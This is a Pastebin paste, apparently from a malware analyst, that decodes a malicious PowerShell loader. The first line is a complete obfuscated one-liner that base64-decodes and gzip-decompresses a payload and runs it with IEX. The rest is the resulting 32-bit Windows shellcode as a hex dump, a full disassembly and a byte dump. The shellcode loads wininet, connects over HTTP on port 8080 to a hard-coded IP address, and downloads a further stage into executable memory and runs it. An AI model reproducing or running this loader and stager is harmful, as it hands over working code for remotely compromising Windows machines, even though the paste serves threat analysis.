API tools faq
paste
Advertisement
James_inthe_box

Decoded

James_inthe_box
Nov 28th, 2017
531
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.85 KB | None | 0 0
raw download clone embed print report
  1. $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  2.  
  3. final
  4. Hex dump: fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 e8 80 00 00 00 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 38 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20 54 72 69 64 65 6e 74 2f 34 2e 30 29 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 59 31 ff 57 57 57 57 51 68 3a 56 79 a7 ff d5 eb 79 5b 31 c9 51 51 6a 03 51 51 68 90 1f 00 00 53 50 68 57 89 9f c6 ff d5 eb 62 59 31 d2 52 68 00 02 60 84 52 52 52 51 52 50 68 eb 55 2e 3b ff d5 89 c6 31 ff 57 57 57 57 56 68 2d 06 18 7b ff d5 85 c0 74 44 31 ff 85 f6 74 04 89 f9 eb 09 68 aa c5 e2 5d ff d5 89 c1 68 45 21 5e 31 ff d5 31 ff 57 6a 07 51 56 50 68 b7 57 e0 0b ff d5 bf 00 2f 00 00 39 c7 74 bc 31 ff eb 15 eb 49 e8 99 ff ff ff 2f 49 4a 57 72 00 00 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 57 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 e8 37 ff ff ff 34 35 2e 37 37 2e 36 34 2e 31 36 38 00
  5. 0x00000000 fc cld
  6. 0x00000001 e889000000 call 0x0000008f
  7. 0x00000006 60 pushad
  8. 0x00000007 89e5 mov ebp,esp
  9. 0x00000009 31d2 xor edx,edx
  10. 0x0000000b 648b5230 fs: mov edx,dword [edx + 48]
  11. 0x0000000f 8b520c mov edx,dword [edx + 12]
  12. 0x00000012 8b5214 mov edx,dword [edx + 20]
  13. 0x00000015 8b7228 mov esi,dword [edx + 40]
  14. 0x00000018 0fb74a26 movzx ecx,word [edx + 38]
  15. 0x0000001c 31ff xor edi,edi
  16. 0x0000001e 31c0 xor eax,eax
  17. 0x00000020 ac lodsb
  18. 0x00000021 3c61 cmp al,97
  19. 0x00000023 7c02 jl 0x00000027
  20. 0x00000025 2c20 sub al,32
  21. 0x00000027 c1cf0d ror edi,13
  22. 0x0000002a 01c7 add edi,eax
  23. 0x0000002c e2f0 loop 0x0000001e
  24. 0x0000002e 52 push edx
  25. 0x0000002f 57 push edi
  26. 0x00000030 8b5210 mov edx,dword [edx + 16]
  27. 0x00000033 8b423c mov eax,dword [edx + 60]
  28. 0x00000036 01d0 add eax,edx
  29. 0x00000038 8b4078 mov eax,dword [eax + 120]
  30. 0x0000003b 85c0 test eax,eax
  31. 0x0000003d 744a jz 0x00000089
  32. 0x0000003f 01d0 add eax,edx
  33. 0x00000041 50 push eax
  34. 0x00000042 8b4818 mov ecx,dword [eax + 24]
  35. 0x00000045 8b5820 mov ebx,dword [eax + 32]
  36. 0x00000048 01d3 add ebx,edx
  37. 0x0000004a e33c jecxz 0x00000088
  38. 0x0000004c 49 dec ecx
  39. 0x0000004d 8b348b mov esi,dword [ebx + ecx * 4]
  40. 0x00000050 01d6 add esi,edx
  41. 0x00000052 31ff xor edi,edi
  42. 0x00000054 31c0 xor eax,eax
  43. 0x00000056 ac lodsb
  44. 0x00000057 c1cf0d ror edi,13
  45. 0x0000005a 01c7 add edi,eax
  46. 0x0000005c 38e0 cmp al,ah
  47. 0x0000005e 75f4 jnz 0x00000054
  48. 0x00000060 037df8 add edi,dword [ebp - 8]
  49. 0x00000063 3b7d24 cmp edi,dword [ebp + 36]
  50. 0x00000066 75e2 jnz 0x0000004a
  51. 0x00000068 58 pop eax
  52. 0x00000069 8b5824 mov ebx,dword [eax + 36]
  53. 0x0000006c 01d3 add ebx,edx
  54. 0x0000006e 668b0c4b mov cx,word [ebx + ecx * 2]
  55. 0x00000072 8b581c mov ebx,dword [eax + 28]
  56. 0x00000075 01d3 add ebx,edx
  57. 0x00000077 8b048b mov eax,dword [ebx + ecx * 4]
  58. 0x0000007a 01d0 add eax,edx
  59. 0x0000007c 89442424 mov dword [esp + 36],eax
  60. 0x00000080 5b pop ebx
  61. 0x00000081 5b pop ebx
  62. 0x00000082 61 popad
  63. 0x00000083 59 pop ecx
  64. 0x00000084 5a pop edx
  65. 0x00000085 51 push ecx
  66. 0x00000086 ffe0 jmp eax
  67. 0x00000088 58 pop eax
  68. 0x00000089 5f pop edi
  69. 0x0000008a 5a pop edx
  70. 0x0000008b 8b12 mov edx,dword [edx]
  71. 0x0000008d eb86 jmp 0x00000015
  72. 0x0000008f 5d pop ebp
  73. 0x00000090 686e657400 push 0x0074656e--> 'ten'
  74. 0x00000095 6877696e69 push 0x696e6977--> 'iniw'
  75. 0x0000009a 54 push esp
  76. 0x0000009b 684c772607 push 0x0726774c--> '&wL'
  77. 0x000000a0 ffd5 call ebp --> kernel32.dll!LoadLibraryA
  78. 0x000000a2 e880000000 call 0x00000127
  79. 0x000000a7 4d dec ebp
  80. 0x000000a8 6f outsd edx,dword [esi]
  81. 0x000000a9 7a69 jpe 0x00000114
  82. 0x000000ab 6c insb byte [esi],edx
  83. 0x000000ac 6c insb byte [esi],edx
  84. 0x000000ad 61 popad
  85. 0x000000ae 2f das
  86. 0x000000af 342e xor al,46
  87. 0x000000b1 3020 xor byte [eax],ah
  88. 0x000000b3 28636f sub byte [ebx + 111],ah
  89. 0x000000b6 6d insd dword [esi],edx
  90. 0x000000b7 7061 jo 0x0000011a
  91. 0x000000b9 7469 jz 0x00000124
  92. 0x000000bb 626c653b bound ebp,dword [ebp + 59]
  93. 0x000000bf 204d53 and byte [ebp + 83],cl
  94. 0x000000c2 49 dec ecx
  95. 0x000000c3 45 inc ebp
  96. 0x000000c4 2038 and byte [eax],bh
  97. 0x000000c6 2e303b cs: xor byte [ebx],bh
  98. 0x000000c9 205769 and byte [edi + 105],dl
  99. 0x000000cc 6e outsb edx,byte [esi]
  100. 0x000000cd 646f fs: outsd edx,dword [esi]
  101. 0x000000cf 7773 ja 0x00000144
  102. 0x000000d1 204e54 and byte [esi + 84],cl
  103. 0x000000d4 20352e313b20 and byte [0x203b312e],dh
  104. 0x000000da 54 push esp
  105. 0x000000db 7269 jc 0x00000146
  106. 0x000000dd 64656e fsgs: outsb edx,byte [esi]
  107. 0x000000e0 742f jz 0x00000111
  108. 0x000000e2 342e xor al,46
  109. 0x000000e4 3029 xor byte [ecx],ch
  110. 0x000000e6 005858 add byte [eax + 88],bl
  111. 0x000000e9 58 pop eax
  112. 0x000000ea 58 pop eax
  113. 0x000000eb 58 pop eax
  114. 0x000000ec 58 pop eax
  115. 0x000000ed 58 pop eax
  116. 0x000000ee 58 pop eax
  117. 0x000000ef 58 pop eax
  118. 0x000000f0 58 pop eax
  119. 0x000000f1 58 pop eax
  120. 0x000000f2 58 pop eax
  121. 0x000000f3 58 pop eax
  122. 0x000000f4 58 pop eax
  123. 0x000000f5 58 pop eax
  124. 0x000000f6 58 pop eax
  125. 0x000000f7 58 pop eax
  126. 0x000000f8 58 pop eax
  127. 0x000000f9 58 pop eax
  128. 0x000000fa 58 pop eax
  129. 0x000000fb 58 pop eax
  130. 0x000000fc 58 pop eax
  131. 0x000000fd 58 pop eax
  132. 0x000000fe 58 pop eax
  133. 0x000000ff 58 pop eax
  134. 0x00000100 58 pop eax
  135. 0x00000101 58 pop eax
  136. 0x00000102 58 pop eax
  137. 0x00000103 58 pop eax
  138. 0x00000104 58 pop eax
  139. 0x00000105 58 pop eax
  140. 0x00000106 58 pop eax
  141. 0x00000107 58 pop eax
  142. 0x00000108 58 pop eax
  143. 0x00000109 58 pop eax
  144. 0x0000010a 58 pop eax
  145. 0x0000010b 58 pop eax
  146. 0x0000010c 58 pop eax
  147. 0x0000010d 58 pop eax
  148. 0x0000010e 58 pop eax
  149. 0x0000010f 58 pop eax
  150. 0x00000110 58 pop eax
  151. 0x00000111 58 pop eax
  152. 0x00000112 58 pop eax
  153. 0x00000113 58 pop eax
  154. 0x00000114 58 pop eax
  155. 0x00000115 58 pop eax
  156. 0x00000116 58 pop eax
  157. 0x00000117 58 pop eax
  158. 0x00000118 58 pop eax
  159. 0x00000119 58 pop eax
  160. 0x0000011a 58 pop eax
  161. 0x0000011b 58 pop eax
  162. 0x0000011c 58 pop eax
  163. 0x0000011d 58 pop eax
  164. 0x0000011e 58 pop eax
  165. 0x0000011f 58 pop eax
  166. 0x00000120 58 pop eax
  167. 0x00000121 58 pop eax
  168. 0x00000122 58 pop eax
  169. 0x00000123 58 pop eax
  170. 0x00000124 58 pop eax
  171. 0x00000125 58 pop eax
  172. 0x00000126 005931 add byte [ecx + 49],bl
  173. 0x00000129 ff5757 call dword [edi + 87]
  174. 0x0000012c 57 push edi
  175. 0x0000012d 57 push edi
  176. 0x0000012e 51 push ecx
  177. 0x0000012f 683a5679a7 push 0xa779563a--> 'yV:'
  178. 0x00000134 ffd5 call ebp --> wininet.dll!InternetOpenA
  179. 0x00000136 eb79 jmp 0x000001b1
  180. 0x00000138 5b pop ebx
  181. 0x00000139 31c9 xor ecx,ecx
  182. 0x0000013b 51 push ecx
  183. 0x0000013c 51 push ecx
  184. 0x0000013d 6a03 push 3
  185. 0x0000013f 51 push ecx
  186. 0x00000140 51 push ecx
  187. 0x00000141 68901f0000 push 0x00001f90
  188. 0x00000146 53 push ebx
  189. 0x00000147 50 push eax
  190. 0x00000148 6857899fc6 push 0xc69f8957
  191. 0x0000014d ffd5 call ebp --> wininet.dll!InternetConnectA
  192. 0x0000014f eb62 jmp 0x000001b3
  193. 0x00000151 59 pop ecx
  194. 0x00000152 31d2 xor edx,edx
  195. 0x00000154 52 push edx
  196. 0x00000155 6800026084 push 0x84600200
  197. 0x0000015a 52 push edx
  198. 0x0000015b 52 push edx
  199. 0x0000015c 52 push edx
  200. 0x0000015d 51 push ecx
  201. 0x0000015e 52 push edx
  202. 0x0000015f 50 push eax
  203. 0x00000160 68eb552e3b push 0x3b2e55eb--> ';.U'
  204. 0x00000165 ffd5 call ebp --> wininet.dll!HttpOpenRequestA
  205. 0x00000167 89c6 mov esi,eax
  206. 0x00000169 31ff xor edi,edi
  207. 0x0000016b 57 push edi
  208. 0x0000016c 57 push edi
  209. 0x0000016d 57 push edi
  210. 0x0000016e 57 push edi
  211. 0x0000016f 56 push esi
  212. 0x00000170 682d06187b push 0x7b18062d--> '{-'
  213. 0x00000175 ffd5 call ebp --> wininet.dll!HttpSendRequestA
  214. 0x00000177 85c0 test eax,eax
  215. 0x00000179 7444 jz 0x000001bf
  216. 0x0000017b 31ff xor edi,edi
  217. 0x0000017d 85f6 test esi,esi
  218. 0x0000017f 7404 jz 0x00000185
  219. 0x00000181 89f9 mov ecx,edi
  220. 0x00000183 eb09 jmp 0x0000018e
  221. 0x00000185 68aac5e25d push 0x5de2c5aa
  222. 0x0000018a ffd5 call ebp --> kernel32.dll!GetLastError
  223. 0x0000018c 89c1 mov ecx,eax
  224. 0x0000018e 6845215e31 push 0x315e2145--> '1^!E'
  225. 0x00000193 ffd5 call ebp
  226. 0x00000195 31ff xor edi,edi
  227. 0x00000197 57 push edi
  228. 0x00000198 6a07 push 7
  229. 0x0000019a 51 push ecx
  230. 0x0000019b 56 push esi
  231. 0x0000019c 50 push eax
  232. 0x0000019d 68b757e00b push 0x0be057b7--> '
  233. W'
  234. 0x000001a2 ffd5 call ebp --> wininet.dll!InternetErrorDlg
  235. 0x000001a4 bf002f0000 mov edi,0x00002f00
  236. 0x000001a9 39c7 cmp edi,eax
  237. 0x000001ab 74bc jz 0x00000169
  238. 0x000001ad 31ff xor edi,edi
  239. 0x000001af eb15 jmp 0x000001c6
  240. 0x000001b1 eb49 jmp 0x000001fc
  241. 0x000001b3 e899ffffff call 0x00000151
  242. 0x000001b8 2f das
  243. 0x000001b9 49 dec ecx
  244. 0x000001ba 4a dec edx
  245. 0x000001bb 57 push edi
  246. 0x000001bc 7200 jc 0x000001be
  247. 0x000001be 0068f0 add byte [eax - 16],ch
  248. 0x000001c1 b5a2 mov ch,162
  249. 0x000001c3 56 push esi
  250. 0x000001c4 ffd5 call ebp
  251. 0x000001c6 6a40 push 64
  252. 0x000001c8 6800100000 push 4096
  253. 0x000001cd 6800004000 push 0x00400000
  254. 0x000001d2 57 push edi
  255. 0x000001d3 6858a453e5 push 0xe553a458--> 'SX'
  256. 0x000001d8 ffd5 call ebp --> kernel32.dll!VirtualAlloc
  257. 0x000001da 93 xchg eax,ebx
  258. 0x000001db 53 push ebx
  259. 0x000001dc 53 push ebx
  260. 0x000001dd 89e7 mov edi,esp
  261. 0x000001df 57 push edi
  262. 0x000001e0 6800200000 push 0x00002000
  263. 0x000001e5 53 push ebx
  264. 0x000001e6 56 push esi
  265. 0x000001e7 68129689e2 push 0xe2899612
  266. 0x000001ec ffd5 call ebp --> wininet.dll!InternetReadFile
  267. 0x000001ee 85c0 test eax,eax
  268. 0x000001f0 74cd jz 0x000001bf
  269. 0x000001f2 8b07 mov eax,dword [edi]
  270. 0x000001f4 01c3 add ebx,eax
  271. 0x000001f6 85c0 test eax,eax
  272. 0x000001f8 75e5 jnz 0x000001df
  273. 0x000001fa 58 pop eax
  274. 0x000001fb c3 ret
  275. 0x000001fc e837ffffff call 0x00000138
  276. 0x00000201 3435 xor al,53
  277. 0x00000203 2e37 cs: aaa
  278. 0x00000205 37 aaa
  279. 0x00000206 2e36342e csss: xor al,46
  280. 0x0000020a 3136 xor dword [esi],esi
  281. 0x0000020c 3800 cmp byte [eax],al
  282.  
  283. Byte Dump:
  284. ......`..1.d.R0.R.R..r(..J&1.1..<a|.,......RW.R..B<...@x..tJ..P.H..X...<I.4...1.1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..X_Z....]hnet.hwiniThLw&........Mozilla/4.0(compatible;MSIE8.0;WindowsNT5.1;Trident/4.0).XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.Y1.WWWWQh:Vy....y[1.QQj.QQh....SPhW......bY1.Rh..`.RRRQRPh.U.;....1.WWWWVh-..{....tD1...t....h...]....hE!^1..1.Wj.QVPh.W...../..9.t.1....I...../IJWr..h...V..j@h....h..@.WhX.S....SS..Wh...SVh........t.......u.X..7...45.77.64.168.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!